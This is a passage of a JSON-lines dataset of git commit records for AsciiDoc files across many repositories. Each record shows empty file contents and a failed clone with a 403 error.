2017-03-17-i-have-been-to-J-A-W-S-D-A-Y-S-2017.adoc","message":"Update 2017-03-17-i-have-been-to-J-A-W-S-D-A-Y-S-2017.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-17-i-have-been-to-J-A-W-S-D-A-Y-S-2017.adoc","new_file":"_posts\/2017-03-17-i-have-been-to-J-A-W-S-D-A-Y-S-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"15ba0742f5288cbbfe2b4704f03e9f68e20c12da","subject":"Update 2015-08-06-Developers-prepare-your-project-to-git-clone-docker-compose-up-pattern.adoc","message":"Update 2015-08-06-Developers-prepare-your-project-to-git-clone-docker-compose-up-pattern.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-06-Developers-prepare-your-project-to-git-clone-docker-compose-up-pattern.adoc","new_file":"_posts\/2015-08-06-Developers-prepare-your-project-to-git-clone-docker-compose-up-pattern.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe9dafaf36544a2cd1f97325aed261f7595fa18a","subject":"Create CONTRIBUTING.adoc","message":"Create CONTRIBUTING.adoc","repos":"Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vtek\/vtek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9aa95816e4c7740cc3e677c715bb03c6b6c4ae65","subject":"docs : 
Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-policy-rest-to-soap","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-rest-to-soap.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0afeb2c16952834a83b3a26ff4abbb7beb54c224","subject":"Update 2016-12-01-hello-world.adoc","message":"Update 2016-12-01-hello-world.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2016-12-01-hello-world.adoc","new_file":"_posts\/2016-12-01-hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d71f3ca9d5bf07c5c218d1265f155524f75494f","subject":"Cleanup usage of HTTPS","message":"Cleanup usage of HTTPS\n","repos":"DongsunPark\/bookmarks,wangcan2014\/tut-bookmarks,razordaze\/tut-bookmarks,Sheparzo\/tut-bookmarks","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DongsunPark\/bookmarks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a21ceef292d50fa4959fcaab017b69551377947a","subject":"Updated documentation","message":"Updated documentation","repos":"RobWin\/circuitbreaker-java8,resilience4j\/resilience4j,mehtabsinghmann\/resilience4j,drmaas\/resilience4j,drmaas\/resilience4j,resilience4j\/resilience4j,RobWin\/javaslang-circuitbreaker,javaslang\/javaslang-circuitbreaker,storozhukBM\/javaslang-circuitbreaker,goldobin\/resilience4j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1c8c0ad12f52147f7238329f73218086916fef88","subject":"Update instructions for publishing changes to the live site","message":"Update instructions for publishing changes to the live site\n\nChange-Id: I7fc1a40d6deedf8eb1a9d8e6d13f803f6109c06b\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/8059\nReviewed-by: Dan Burkert <2591e5f46f28d303f9dc027d475a5c60d8dea17a@cloudera.com>\nTested-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\n","repos":"andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: 
unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"960efe62028ed069f89a3a9a56af068957e21fe9","subject":"Fixed typo in cat indices docs","message":"Fixed typo in cat indices docs\n","repos":"alexshadow007\/elasticsearch,s1monw\/elasticsearch,rajanm\/elasticsearch,Stacey-Gammon\/elasticsearch,LewayneNaidoo\/elasticsearch,scottsom\/elasticsearch,JSCooke\/elasticsearch,scottsom\/elasticsearch,nilabhsagar\/elasticsearch,njlawton\/elasticsearch,artnowo\/elasticsearch,scorpionvicky\/elasticsearch,jimczi\/elasticsearch,nilabhsagar\/elasticsearch,maddin2016\/elasticsearch,JervyShi\/elasticsearch,mikemccand\/elasticsearch,nazarewk\/elasticsearch,alexshadow007\/elasticsearch,lks21c\/elasticsearch,JSCooke\/elasticsearch,ZTE-PaaS\/elasticsearch,nilabhsagar\/elasticsearch,a2lin\/elasticsearch,mjason3\/elasticsearch,nknize\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,spiegela\/elasticsearch,i-am-Nathan\/elasticsearch,LeoYao\/elasticsearch,IanvsPoplicola\/elasticsearch,sneivandt\/elasticsearch,HonzaKral\/elasticsearch,wuranbo\/elasticsearch,rajanm\/elasticsearch,mohit\/elasticsearch,wenpos\/elasticsearch,fred84\/elasticsearch,StefanGor\/elasticsearch,strapdata\/elassandra,winstonewert\/elasticsearch,obourgain\/elasticsearch,obourgain\/elasticsearch,jprante\/elasticsearch,mortonsykes\/elasticsearch,gfyoung\/elasticsearch,sneivandt\/elasticsearch,elasticdog\/elasticsearch,i-am-Nathan\/elasticsearch,liweinan0423\/elasticsearch,fernandozhu\/elasticsearch,elasticdog\/elasticsearch,JervyShi\/elasticsearch,geidies\/elasticsearch,fforbeck\/elasticsearch,umeshdangat\/elasticsearch,bawse\/elasticsearch,wuranbo\/elasticsearch,mikemccand\/elasticsearch,mjason3\/elasticsearch,maddin2016\/elasticsearch,jimczi\/elasticsearch,robin13\/elasticsearch,Helen-Zhao\/elasticsearch,glefloch\/elasticsearch,StefanGor\/elasticsearch,gfyoung\/elasticsearch,fforbeck\/elasticsearch,henakamaMSFT\/elasticsearch,LeoYao\/elasticsearch,s1monw\/elasticsearch,alexshadow007\/elasticsearch,glefloch\/elasticsearch,markwalkom\/elasticsearch,Stacey-Gammon\/elasticsearch,JackyMai\/elasticsearch,sneivandt\/elasticsearch,henakamaMSFT\/elasticsearch,jprante\/elasticsearch,JervyShi\/elasticsearch,jimczi\/elasticsearch,Shepard1212\/elasticsearch,yanjunh\/elasticsearch,robin13\/elasticsearch,winstonewert\/elasticsearch,wangtuo\/elasticsearch,MisterAndersen\/elasticsearch,IanvsPoplicola\/elasticsearch,dongjoon-hyun\/elasticsearch,sneivandt\/elasticsearch,nazarewk\/elasticsearch,umeshdangat\/elasticsearch,strapdata\/elassandra,scorpionvicky\/elasticsearch,JervyShi\/elasticsearch,umeshdangat\/elasticsearch,umeshdangat\/elasticsearch,mortonsykes\/elasticsearch,kalimatas\/elasticsearch,glefloch\/elasticsearch,yanjunh\/elasticsearch,IanvsPoplicola\/elasticsearch,JervyShi\/elasticsearch,nknize\/elasticsearch,vroyer\/elasticassandra,liweinan0423\/elasticsearch,GlenRSmith\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,JackyMai\/elasticsearch,rajanm\/elasticsearch,markwalkom\/elasticsearch,naveenhooda2000\/elasticsearch,brandonkearby\/elasticsearch,scorpionvicky\/elasticsearch,naveenhooda2000\/elasticsearch,s1monw\/elasticsearch,strapdata\/elassandra,LeoYao\/elasticsearch,mikemccand\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,fforbeck\/elasticsearch,Helen-Zhao\/elasticsearch,brandonkearby\/elasticsearch,jimczi\/elasticsearch,strapdata\/elassandra,gingerwizard\/elasticsearch,a2lin\/elasticsearch,nazarewk\/elasticsearch,vroyer\/elas
ticassandra,ThiagoGarciaAlves\/elasticsearch,masaruh\/elasticsearch,gingerwizard\/elasticsearch,mohit\/elasticsearch,gmarz\/elasticsearch,elasticdog\/elasticsearch,HonzaKral\/elasticsearch,IanvsPoplicola\/elasticsearch,wuranbo\/elasticsearch,nknize\/elasticsearch,s1monw\/elasticsearch,gmarz\/elasticsearch,fred84\/elasticsearch,jprante\/elasticsearch,nazarewk\/elasticsearch,coding0011\/elasticsearch,artnowo\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,masaruh\/elasticsearch,winstonewert\/elasticsearch,Shepard1212\/elasticsearch,coding0011\/elasticsearch,C-Bish\/elasticsearch,gingerwizard\/elasticsearch,lks21c\/elasticsearch,lks21c\/elasticsearch,jprante\/elasticsearch,LeoYao\/elasticsearch,StefanGor\/elasticsearch,a2lin\/elasticsearch,nezirus\/elasticsearch,C-Bish\/elasticsearch,pozhidaevak\/elasticsearch,ZTE-PaaS\/elasticsearch,shreejay\/elasticsearch,Shepard1212\/elasticsearch,nezirus\/elasticsearch,glefloch\/elasticsearch,Stacey-Gammon\/elasticsearch,Helen-Zhao\/elasticsearch,markwalkom\/elasticsearch,Helen-Zhao\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,JackyMai\/elasticsearch,scottsom\/elasticsearch,brandonkearby\/elasticsearch,obourgain\/elasticsearch,s1monw\/elasticsearch,LewayneNaidoo\/elasticsearch,ricardocerq\/elasticsearch,wuranbo\/elasticsearch,elasticdog\/elasticsearch,wangtuo\/elasticsearch,wenpos\/elasticsearch,a2lin\/elasticsearch,lks21c\/elasticsearch,henakamaMSFT\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,Stacey-Gammon\/elasticsearch,Shepard1212\/elasticsearch,pozhidaevak\/elasticsearch,wenpos\/elasticsearch,dongjoon-hyun\/elasticsearch,nilabhsagar\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,kalimatas\/elasticsearch,jimczi\/elasticsearch,ZTE-PaaS\/elasticsearch,markwalkom\/elasticsearch,artnowo\/elasticsearch,spiegela\/elasticsearch,nknize\/elasticsearch,fforbeck\/elasticsearch,maddin2016\/elasticsearch,brandonkearby\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,liweinan0423\/elasticsearch,maddin2016\/elasticsearch,ZTE-PaaS\/elasticsearch,strapdata\/elassandra,shreejay\/elasticsearch,yanjunh\/elasticsearch,JSCooke\/elasticsearch,GlenRSmith\/elasticsearch,IanvsPoplicola\/elasticsearch,shreejay\/elasticsearch,kalimatas\/elasticsearch,gingerwizard\/elasticsearch,MaineC\/elasticsearch,fred84\/elasticsearch,fred84\/elasticsearch,kalimatas\/elasticsearch,rlugojr\/elasticsearch,fred84\/elasticsearch,henakamaMSFT\/elasticsearch,kalimatas\/elasticsearch,elasticdog\/elasticsearch,wangtuo\/elasticsearch,gingerwizard\/elasticsearch,mohit\/elasticsearch,vroyer\/elasticassandra,lks21c\/elasticsearch,LewayneNaidoo\/elasticsearch,LeoYao\/elasticsearch,MisterAndersen\/elasticsearch,JervyShi\/elasticsearch,markwalkom\/elasticsearch,vroyer\/elassandra,winstonewert\/elasticsearch,wenpos\/elasticsearch,ricardocerq\/elasticsearch,MisterAndersen\/elasticsearch,naveenhooda2000\/elasticsearch,mikemccand\/elasticsearch,bawse\/elasticsearch,MisterAndersen\/elasticsearch,alexshadow007\/elasticsearch,coding0011\/elasticsearch,mohit\/elasticsearch,bawse\/elasticsearch,scorpionvicky\/elasticsearch,liweinan0423\/elasticsearch,mjason3\/elasticsearch,njlawton\/elasticsearch,shreejay\/elasticsearch,nezirus\/elasticsearch,artnowo\/elasticsearch,ZTE-PaaS\/elasticsearch,njlawton\/elasticsearch,mortonsykes\/elasticsearch,masaruh\/elasticsearch,gmarz\/elasticsearch,LewayneNaidoo\/elasticsearch,sneivandt\/elasticsearch,mjason3\/elasticsearch,spiegela\/elasticsearch,bawse\/elasticsearch,C-Bish\
/elasticsearch,gmarz\/elasticsearch,StefanGor\/elasticsearch,umeshdangat\/elasticsearch,mortonsykes\/elasticsearch,vroyer\/elassandra,masaruh\/elasticsearch,rlugojr\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,rlugojr\/elasticsearch,geidies\/elasticsearch,wangtuo\/elasticsearch,qwerty4030\/elasticsearch,Stacey-Gammon\/elasticsearch,Shepard1212\/elasticsearch,scottsom\/elasticsearch,maddin2016\/elasticsearch,spiegela\/elasticsearch,fernandozhu\/elasticsearch,qwerty4030\/elasticsearch,rajanm\/elasticsearch,winstonewert\/elasticsearch,rlugojr\/elasticsearch,gfyoung\/elasticsearch,obourgain\/elasticsearch,geidies\/elasticsearch,LeoYao\/elasticsearch,njlawton\/elasticsearch,pozhidaevak\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,fforbeck\/elasticsearch,StefanGor\/elasticsearch,qwerty4030\/elasticsearch,ricardocerq\/elasticsearch,vroyer\/elassandra,wenpos\/elasticsearch,glefloch\/elasticsearch,LeoYao\/elasticsearch,yanjunh\/elasticsearch,MisterAndersen\/elasticsearch,wuranbo\/elasticsearch,mikemccand\/elasticsearch,GlenRSmith\/elasticsearch,i-am-Nathan\/elasticsearch,geidies\/elasticsearch,JSCooke\/elasticsearch,JackyMai\/elasticsearch,gfyoung\/elasticsearch,nazarewk\/elasticsearch,rlugojr\/elasticsearch,markwalkom\/elasticsearch,rajanm\/elasticsearch,artnowo\/elasticsearch,geidies\/elasticsearch,naveenhooda2000\/elasticsearch,robin13\/elasticsearch,naveenhooda2000\/elasticsearch,i-am-Nathan\/elasticsearch,jprante\/elasticsearch,JackyMai\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,a2lin\/elasticsearch,dongjoon-hyun\/elasticsearch,MaineC\/elasticsearch,pozhidaevak\/elasticsearch,ricardocerq\/elasticsearch,nilabhsagar\/elasticsearch,fernandozhu\/elasticsearch,coding0011\/elasticsearch,wangtuo\/elasticsearch,mortonsykes\/elasticsearch,HonzaKral\/elasticsearch,henakamaMSFT\/elasticsearch,bawse\/elasticsearch,MaineC\/elasticsearch,LewayneNaidoo\/elasticsearch,MaineC\/elasticsearch,uschindler\/elasticsearch,masaruh\/elasticsearch,dongjoon-hyun\/elasticsearch,geidies\/elasticsearch,i-am-Nathan\/elasticsearch,nezirus\/elasticsearch,mjason3\/elasticsearch,fernandozhu\/elasticsearch,spiegela\/elasticsearch,JSCooke\/elasticsearch,MaineC\/elasticsearch,liweinan0423\/elasticsearch,obourgain\/elasticsearch,gmarz\/elasticsearch,Helen-Zhao\/elasticsearch,nezirus\/elasticsearch,GlenRSmith\/elasticsearch,qwerty4030\/elasticsearch,alexshadow007\/elasticsearch,C-Bish\/elasticsearch,fernandozhu\/elasticsearch,scottsom\/elasticsearch,dongjoon-hyun\/elasticsearch,shreejay\/elasticsearch,brandonkearby\/elasticsearch,qwerty4030\/elasticsearch,yanjunh\/elasticsearch,mohit\/elasticsearch,njlawton\/elasticsearch,C-Bish\/elasticsearch,pozhidaevak\/elasticsearch,ricardocerq\/elasticsearch","old_file":"docs\/reference\/cat\/indices.asciidoc","new_file":"docs\/reference\/cat\/indices.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"413e97d529dc567d58521fed6a1a38863d9b04b2","subject":"add clojurewest","message":"add clojurewest\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2016\/clojurewest.adoc","new_file":"content\/events\/2016\/clojurewest.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 
403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"53f77956eb58fc4983bd17f66b2084fc26d691ef","subject":"Update 2019-05-29.adoc","message":"Update 2019-05-29.adoc","repos":"dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru","old_file":"_posts\/2019-05-29.adoc","new_file":"_posts\/2019-05-29.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dsp25no\/blog.dsp25no.ru.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d4fcdbb57c1d9807638ca80cdabad1938c3c6e9","subject":"Create Java8.adoc","message":"Create Java8.adoc","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"Java8.adoc","new_file":"Java8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"8473d42ca5c739d48aa97e2d49fd08882f05c9cc","subject":"#121 Initial version of autocomplete user manual page (work in progress)","message":"#121 Initial version of autocomplete user manual page (work in progress)\n","repos":"remkop\/picocli,remkop\/picocli,remkop\/picocli,remkop\/picocli","old_file":"docs\/autocomplete.adoc","new_file":"docs\/autocomplete.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remkop\/picocli.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3e3c1875380c49bd314388fe92c7e7671292e765","subject":"Added docs for environment variables CLI cmd","message":"Added docs for environment variables CLI cmd\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"dev_guide\/environment_variables.adoc","new_file":"dev_guide\/environment_variables.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xiaoping378\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"13318b41f6480e1d330a2a4779bfdb900c223da4","subject":"Update 2017-03-10-Prose-Poem-2.adoc","message":"Update 2017-03-10-Prose-Poem-2.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-03-10-Prose-Poem-2.adoc","new_file":"_posts\/2017-03-10-Prose-Poem-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e16d7366bdb1bcb9564173aea47e01c2db49909","subject":"Update 2018-04-20-Java-Puzzles.adoc","message":"Update 2018-04-20-Java-Puzzles.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-04-20-Java-Puzzles.adoc","new_file":"_posts\/2018-04-20-Java-Puzzles.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"44a029df755d1e341c94979da1c196b583fc9a43","subject":"docs added","message":"docs added\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"25dbbfe23d8daf57eef646e9b9a3f9d023ad117f","subject":"Update 2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","message":"Update 2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","new_file":"_posts\/2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8852a50e50a449ece2c769181a8601f7460ce2f2","subject":"Update 2016-10-08-Setting-up-Neo4j-for-Spatial-Queries.adoc","message":"Update 2016-10-08-Setting-up-Neo4j-for-Spatial-Queries.adoc","repos":"trycrmr\/hubpress.io,trycrmr\/hubpress.io,trycrmr\/hubpress.io,trycrmr\/hubpress.io","old_file":"_posts\/2016-10-08-Setting-up-Neo4j-for-Spatial-Queries.adoc","new_file":"_posts\/2016-10-08-Setting-up-Neo4j-for-Spatial-Queries.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/trycrmr\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c76278b84c0ac03953dffb0e04af3a76de8ce061","subject":"Update 2017-03-26-Ngetes-Stompbox-AMT-P-1-MXR-Ten-Band.adoc","message":"Update 2017-03-26-Ngetes-Stompbox-AMT-P-1-MXR-Ten-Band.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2017-03-26-Ngetes-Stompbox-AMT-P-1-MXR-Ten-Band.adoc","new_file":"_posts\/2017-03-26-Ngetes-Stompbox-AMT-P-1-MXR-Ten-Band.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"904dcc71270b7b2e984a7f897e2c2680775b1112","subject":"Remove timeout parameter from plugin script docs","message":"Remove timeout parameter from plugin script docs\n\nSupport for this parameter was removed but the docs were not\r\nupdated. 
This commit removes this stale parameter from the docs.\r\n\r\nRelates #21068\r\n","repos":"GlenRSmith\/elasticsearch,brandonkearby\/elasticsearch,mikemccand\/elasticsearch,i-am-Nathan\/elasticsearch,C-Bish\/elasticsearch,pozhidaevak\/elasticsearch,brandonkearby\/elasticsearch,gmarz\/elasticsearch,elasticdog\/elasticsearch,JackyMai\/elasticsearch,nezirus\/elasticsearch,yanjunh\/elasticsearch,alexshadow007\/elasticsearch,LewayneNaidoo\/elasticsearch,naveenhooda2000\/elasticsearch,Helen-Zhao\/elasticsearch,yanjunh\/elasticsearch,IanvsPoplicola\/elasticsearch,IanvsPoplicola\/elasticsearch,shreejay\/elasticsearch,C-Bish\/elasticsearch,uschindler\/elasticsearch,njlawton\/elasticsearch,MaineC\/elasticsearch,qwerty4030\/elasticsearch,sneivandt\/elasticsearch,Shepard1212\/elasticsearch,qwerty4030\/elasticsearch,Helen-Zhao\/elasticsearch,pozhidaevak\/elasticsearch,rlugojr\/elasticsearch,Shepard1212\/elasticsearch,spiegela\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,elasticdog\/elasticsearch,maddin2016\/elasticsearch,IanvsPoplicola\/elasticsearch,Stacey-Gammon\/elasticsearch,fforbeck\/elasticsearch,Stacey-Gammon\/elasticsearch,wuranbo\/elasticsearch,fred84\/elasticsearch,kalimatas\/elasticsearch,nknize\/elasticsearch,umeshdangat\/elasticsearch,mortonsykes\/elasticsearch,masaruh\/elasticsearch,geidies\/elasticsearch,LeoYao\/elasticsearch,markwalkom\/elasticsearch,masaruh\/elasticsearch,njlawton\/elasticsearch,artnowo\/elasticsearch,naveenhooda2000\/elasticsearch,mohit\/elasticsearch,vroyer\/elassandra,glefloch\/elasticsearch,a2lin\/elasticsearch,wuranbo\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,a2lin\/elasticsearch,robin13\/elasticsearch,vroyer\/elasticassandra,a2lin\/elasticsearch,ZTE-PaaS\/elasticsearch,robin13\/elasticsearch,rlugojr\/elasticsearch,GlenRSmith\/elasticsearch,MaineC\/elasticsearch,henakamaMSFT\/elasticsearch,geidies\/elasticsearch,yanjunh\/elasticsearch,nezirus\/elasticsearch,bawse\/elasticsearch,gmarz\/elasticsearch,fred84\/elasticsearch,sneivandt\/elasticsearch,fforbeck\/elasticsearch,bawse\/elasticsearch,C-Bish\/elasticsearch,yanjunh\/elasticsearch,JervyShi\/elasticsearch,strapdata\/elassandra,Helen-Zhao\/elasticsearch,jimczi\/elasticsearch,Shepard1212\/elasticsearch,nilabhsagar\/elasticsearch,bawse\/elasticsearch,a2lin\/elasticsearch,s1monw\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,Shepard1212\/elasticsearch,jimczi\/elasticsearch,artnowo\/elasticsearch,shreejay\/elasticsearch,MisterAndersen\/elasticsearch,JackyMai\/elasticsearch,robin13\/elasticsearch,wenpos\/elasticsearch,rajanm\/elasticsearch,rajanm\/elasticsearch,alexshadow007\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,naveenhooda2000\/elasticsearch,mohit\/elasticsearch,sneivandt\/elasticsearch,wangtuo\/elasticsearch,qwerty4030\/elasticsearch,JSCooke\/elasticsearch,LeoYao\/elasticsearch,MisterAndersen\/elasticsearch,s1monw\/elasticsearch,nazarewk\/elasticsearch,naveenhooda2000\/elasticsearch,obourgain\/elasticsearch,mikemccand\/elasticsearch,njlawton\/elasticsearch,Helen-Zhao\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,IanvsPoplicola\/elasticsearch,glefloch\/elasticsearch,umeshdangat\/elasticsearch,JackyMai\/elasticsearch,MaineC\/elasticsearch,jimczi\/elasticsearch,HonzaKral\/elasticsearch,wangtuo\/elasticsearch,obourgain\/elasticsearch,JSCooke\/elasticsearch,winstonewert\/elasticsearch,gmarz\/elasticsearch,glefloch\/elasticsearch,umeshdangat\/elasticsearch,JackyMai\/elasticsearch,fred84\/elasticsearch,nazarewk\/elasticsearch,Stacey-Gammon\/elasti
csearch,brandonkearby\/elasticsearch,a2lin\/elasticsearch,fernandozhu\/elasticsearch,JSCooke\/elasticsearch,MisterAndersen\/elasticsearch,ZTE-PaaS\/elasticsearch,umeshdangat\/elasticsearch,LewayneNaidoo\/elasticsearch,gmarz\/elasticsearch,brandonkearby\/elasticsearch,coding0011\/elasticsearch,spiegela\/elasticsearch,scottsom\/elasticsearch,rajanm\/elasticsearch,markwalkom\/elasticsearch,scottsom\/elasticsearch,sneivandt\/elasticsearch,jprante\/elasticsearch,nilabhsagar\/elasticsearch,artnowo\/elasticsearch,fernandozhu\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,nezirus\/elasticsearch,kalimatas\/elasticsearch,fred84\/elasticsearch,alexshadow007\/elasticsearch,sneivandt\/elasticsearch,strapdata\/elassandra,scottsom\/elasticsearch,bawse\/elasticsearch,LeoYao\/elasticsearch,StefanGor\/elasticsearch,fernandozhu\/elasticsearch,mjason3\/elasticsearch,maddin2016\/elasticsearch,nknize\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,njlawton\/elasticsearch,strapdata\/elassandra,nezirus\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,JackyMai\/elasticsearch,spiegela\/elasticsearch,vroyer\/elasticassandra,LewayneNaidoo\/elasticsearch,mikemccand\/elasticsearch,strapdata\/elassandra,nazarewk\/elasticsearch,wenpos\/elasticsearch,nknize\/elasticsearch,wangtuo\/elasticsearch,mortonsykes\/elasticsearch,rlugojr\/elasticsearch,fernandozhu\/elasticsearch,umeshdangat\/elasticsearch,JervyShi\/elasticsearch,lks2